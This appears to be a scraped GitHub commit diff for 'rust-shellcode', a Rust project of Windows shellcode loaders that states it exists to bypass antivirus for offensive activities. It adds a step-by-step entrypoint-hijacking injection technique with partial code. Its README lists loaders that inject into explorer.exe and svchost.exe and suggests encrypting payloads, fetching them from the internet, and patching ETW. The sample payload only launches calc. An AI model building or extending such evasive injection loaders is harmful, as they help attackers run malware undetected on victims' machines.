b1nhack
diff --git a/‎README.md
Lines changed: 19 additions & 15 deletions b/‎README.md
Lines changed: 19 additions & 15 deletions
diff --git a/‎create_process/src/main.rs
Lines changed: 4 additions & 1 deletion b/‎create_process/src/main.rs
Lines changed: 4 additions & 1 deletion
diff --git a/‎create_remote_thread/src/main.rs
Lines changed: 1 addition & 1 deletion b/‎create_remote_thread/src/main.rs
Lines changed: 1 addition & 1 deletion
diff --git a/‎create_remote_thread_native/src/main.rs
Lines changed: 1 addition & 1 deletion b/‎create_remote_thread_native/src/main.rs
Lines changed: 1 addition & 1 deletion
diff --git a/‎create_thread/src/main.rs
Lines changed: 1 addition & 1 deletion b/‎create_thread/src/main.rs
Lines changed: 1 addition & 1 deletion
diff --git a/‎create_thread_native/src/main.rs
Lines changed: 1 addition & 1 deletion b/‎create_thread_native/src/main.rs
Lines changed: 1 addition & 1 deletion
diff --git a/‎early_bird/src/main.rs
Lines changed: 1 addition & 1 deletion b/‎early_bird/src/main.rs
Lines changed: 1 addition & 1 deletion
diff --git a/‎etwp_create_etw_thread/src/main.rs
Lines changed: 1 addition & 1 deletion b/‎etwp_create_etw_thread/src/main.rs
Lines changed: 1 addition & 1 deletion
diff --git a/‎memmap2_transmute/src/main.rs
Lines changed: 1 addition & 1 deletion b/‎memmap2_transmute/src/main.rs
Lines changed: 1 addition & 1 deletion
diff --git a/‎nt_queue_apc_thread_ex_local/src/main.rs
Lines changed: 1 addition & 1 deletion b/‎nt_queue_apc_thread_ex_local/src/main.rs
Lines changed: 1 addition & 1 deletion
@@ -1,9 +1,9 @@
-# 🤖 rust-SHELLCODE 🤖
-
+# 🤖 rust-shellcode 🤖
 This project provides the underlying support for bypass av of offensive activities.  
 The available Shellcode loaders include:
 * [asm](#asm)
 * [create_fiber](#create_fiber)
+* [create_process](#create_process)
 * [create_remote_thread](#create_remote_thread)
 * [create_remote_thread_native](#create_remote_thread_native)
 * [create_thread](#create_thread)
@@ -15,7 +15,6 @@ The available Shellcode loaders include:
 * [rtl_create_user_thread](#rtl_create_user_thread)
 
 ## Build
-
 This is a rust project, you need install [rust](https://www.rust-lang.org/) first.  
 Then, you can build with follow command:
 
@@ -26,20 +25,17 @@ cargo build --release
 Binarys in `target/release`
 
 ## How to use
-
 This project is just a basic demo, you need to choose the right loading method, 
 encrypt the SHELLCODE, download the SHELLCODE from the internet, 
 or use it with ETW patch, unhooking, etc.
 
 ## asm
-
 SHELLCODE execute locally.
 1. link SHELLCODE to .text section
 2. inline asm using asm! macro
 3. call SHELLCODE
 
 ## create_fiber
-
 SHELLCODE execute locally.
 1. convert current thread to fiber using `ConvertThreadToFiber`
 2. alloc memory using `VirtualAlloc`
@@ -48,8 +44,24 @@ SHELLCODE execute locally.
 5. jump SHELLCODE using `SwitchToFiber`
 6. jump back
 
-## create_remote_thread
+## create_process
+SHELLCODE execute locally.
+1. create a process in `CREATE_SUSPENDED` state using `CreateProcessA`
+2. alloc remote memory using `VirtualAllocEx`
+3. copy SHELLCODE to allocated memory using `WriteProcessMemory`
+4. change memory permission to executable using `VirtualProtectEx`
+5. get `PROCESS_BASIC_INFORMATION` using `NtQueryInformationProcess`
+6. get `PEB` using `ReadProcessMemory`
+7. get `IMAGE_DOS_HEADER` using `ReadProcessMemory`
+8. get `IMAGE_FILE_HEADER` using `ReadProcessMemory`
+9. determine `IMAGE_FILE_HEADER.Machine` is x86 or x64
+10. get `[IMAGE_OPTIONAL_HEADER32|IMAGE_OPTIONAL_HEADER64]` using `ReadProcessMemory`
+11. let `entrypoint` = `ImageBaseAddress` + `[IMAGE_OPTIONAL_HEADER32|IMAGE_OPTIONAL_HEADER64].AddressOfEntryPoint`
+12. write a piece of assembly code to the `entrypoint` to jump to the SHELLCODE using `WriteProcessMemory`
+13. resume process's thread using `ResumeThread`
+14. close opened handle using `CloseHandle`
 
+## create_remote_thread
 SHELLCODE execute remotely.  
 inject `explorer.exe` by default.
 1. get pid by process name using crate `sysinfo`
@@ -61,14 +73,12 @@ inject `explorer.exe` by default.
 7. close opened handle using `CloseHandle`
 
 ## create_remote_thread_native
-
 SHELLCODE execute remotely.  
 inject `explorer.exe` by default.  
 this is same with [create_remote_thread](#create_remote_thread), but without crate `windows-sys`  
 using crate `libloading` get functions from dlls.
 
 ## create_thread
-
 SHELLCODE execute locally.
 1. alloc remote memory using `VirtualAlloc`
 2. copy SHELLCODE to allocated memory using `std::ptr::copy`
@@ -77,13 +87,11 @@ SHELLCODE execute locally.
 5. waiting thread exit using `WaitForSingleObject`
 
 ## create_thread_native
-
 SHELLCODE execute locally.  
 this is same with [create_thread](#create_thread), but without crate `windows-sys`  
 using crate `libloading` get functions from dlls.
 
 ## early_bird
-
 SHELLCODE execute remotely.  
 create and inject `svchost.exe` by default.
 1. create a process using `CreateProcessA`
@@ -95,7 +103,6 @@ create and inject `svchost.exe` by default.
 7. close opened handle using `CloseHandle`
 
 ## etwp_create_etw_thread
-
 SHELLCODE execute locally.
 1. get `EtwpCreateEtwThread` funtion from `ntdll` using `LoadLibraryA` and `GetProcAddress`
 2. alloc remote memory using `VirtualAlloc`
@@ -105,7 +112,6 @@ SHELLCODE execute locally.
 6. waiting thread exit using `WaitForSingleObject`
 
 ## memmap2_transmute
-
 SHELLCODE execute locally.
 1. alloc memory using crate `memmap2`
 2. copy SHELLCODE using `copy_from_slice` function from `MmapMut` struct
@@ -114,7 +120,6 @@ SHELLCODE execute locally.
 5. execute fn
 
 ## nt_queue_apc_thread_ex_local
-
 SHELLCODE execute locally.
 1. get `NtQueueApcThreadEx` funtion from `ntdll` using `LoadLibraryA` and `GetProcAddress`
 2. alloc remote memory using `VirtualAlloc`
@@ -124,7 +129,6 @@ SHELLCODE execute locally.
 6. execute SHELLCODE using `NtQueueApcThreadEx`
 
 ## rtl_create_user_thread
-
 SHELLCODE execute remotely.  
 inject `explorer.exe` by default.
 1. get `RtlCreateUserThread` funtion from `ntdll` using `LoadLibraryA` and `GetProcAddress`
 
@@ -20,7 +20,7 @@ use windows_sys::Win32::System::Threading::{
 #[cfg(target_os = "windows")]
 fn main() {
     let shellcode = include_bytes!("../../w64-exec-calc-shellcode-func.bin");
-    let shellcode_size: usize = shellcode.len();
+    let shellcode_size = shellcode.len();
     let program = b"C:\\Windows\\System32\\calc.exe\0";
 
     unsafe {
@@ -190,12 +190,14 @@ fn main() {
         let mut ep_buffer = vec![];
         match pe_header.Machine {
             0x8664_u16 => {
+                // rex; mov eax
                 ep_buffer.push(0x48_u8);
                 ep_buffer.push(0xb8_u8);
                 let mut shellcode_addr = (addr as usize).to_le_bytes().to_vec();
                 ep_buffer.append(&mut shellcode_addr);
             }
             0x14c_u16 => {
+                // mov eax
                 ep_buffer.push(0xb8_u8);
                 let mut shellcode_addr = (addr as usize).to_le_bytes().to_vec();
                 ep_buffer.append(&mut shellcode_addr);
@@ -205,6 +207,7 @@ fn main() {
                 pe_header.Machine
             ),
         }
+        // jmp [r|e]ax
         ep_buffer.push(0xff_u8);
         ep_buffer.push(0xe0_u8);
 
 
@@ -13,7 +13,7 @@ use windows_sys::Win32::System::Threading::{CreateRemoteThread, OpenProcess, PRO
 #[cfg(target_os = "windows")]
 fn main() {
     let shellcode = include_bytes!("../../w64-exec-calc-shellcode-func.bin");
-    let shellcode_size: usize = shellcode.len();
+    let shellcode_size = shellcode.len();
 
     let mut system = System::new();
     system.refresh_processes();
 
@@ -15,7 +15,7 @@ const FALSE: i32 = 0;
 #[cfg(target_os = "windows")]
 fn main() {
     let shellcode = include_bytes!("../../w64-exec-calc-shellcode-func.bin");
-    let shellcode_size: usize = shellcode.len();
+    let shellcode_size = shellcode.len();
 
     let mut system = System::new();
     system.refresh_processes();
 
@@ -11,7 +11,7 @@ use windows_sys::Win32::System::Threading::{CreateThread, WaitForSingleObject};
 #[cfg(target_os = "windows")]
 fn main() {
     let shellcode = include_bytes!("../../w64-exec-calc-shellcode-func.bin");
-    let shellcode_size: usize = shellcode.len();
+    let shellcode_size = shellcode.len();
 
     unsafe {
         let addr = VirtualAlloc(
 
@@ -14,7 +14,7 @@ const WAIT_FAILED: u32 = 0xFFFFFFFF;
 #[cfg(target_os = "windows")]
 fn main() {
     let shellcode = include_bytes!("../../w64-exec-calc-shellcode-func.bin");
-    let shellcode_size: usize = shellcode.len();
+    let shellcode_size = shellcode.len();
 
     unsafe {
         let kernel32 = Library::new("kernel32.dll").expect("[-]no kernel32.dll!");
 
@@ -15,7 +15,7 @@ use windows_sys::Win32::System::Threading::{
 #[cfg(target_os = "windows")]
 fn main() {
     let shellcode = include_bytes!("../../w64-exec-calc-shellcode-func.bin");
-    let shellcode_size: usize = shellcode.len();
+    let shellcode_size = shellcode.len();
     let program = b"C:\\Windows\\System32\\calc.exe\0";
 
     unsafe {
 
@@ -13,7 +13,7 @@ use windows_sys::Win32::System::Threading::WaitForSingleObject;
 #[cfg(target_os = "windows")]
 fn main() {
     let shellcode = include_bytes!("../../w64-exec-calc-shellcode-func.bin");
-    let shellcode_size: usize = shellcode.len();
+    let shellcode_size = shellcode.len();
 
     unsafe {
         let ntdll = LoadLibraryA(b"ntdll.dll\0".as_ptr());
 
@@ -6,7 +6,7 @@ use std::mem::transmute;
 #[cfg(target_os = "windows")]
 fn main() {
     let shellcode = include_bytes!("../../w64-exec-calc-shellcode-func.bin");
-    let shellcode_size: usize = shellcode.len();
+    let shellcode_size = shellcode.len();
 
     let mut mmap = MmapOptions::new()
         .len(shellcode_size)
 
@@ -13,7 +13,7 @@ use windows_sys::Win32::System::Threading::GetCurrentThread;
 #[cfg(target_os = "windows")]
 fn main() {
     let shellcode = include_bytes!("../../w64-exec-calc-shellcode-func.bin");
-    let shellcode_size: usize = shellcode.len();
+    let shellcode_size = shellcode.len();
 
     unsafe {
         let ntdll = LoadLibraryA(b"ntdll.dll\0".as_ptr());